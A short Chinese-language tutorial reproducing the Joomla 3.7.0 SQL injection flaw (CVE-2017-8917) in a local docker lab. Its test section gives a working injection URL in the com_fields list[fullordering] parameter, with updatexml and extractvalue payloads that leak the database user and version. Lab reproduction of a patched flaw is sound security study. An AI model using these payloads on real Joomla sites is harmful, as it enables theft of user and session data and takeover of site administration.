Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
一什么是Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
Joomla于5月17日发布了新版本3.7.1,本次更新中修复一个高危SQL注入漏洞。
二漏洞利用
这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。
三漏洞复现
首先进入docker环境 使用命令 docker-compose up -d 进行搭建 截图如下
我们继续等待等待完成后 会出现如下图所示界面 才算启动成功
然后注册joomla 注册成功之后访问网址http://127.0.0.1:8080
注册进入下一步
四、漏洞测试
在地址localhost:8080后添加以下内容,并访问
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
将updatexml(0x23,concat(1,user()),1)改为extractvalue(666,concat(0x3a,version(),0x3a))
漏洞测试完毕。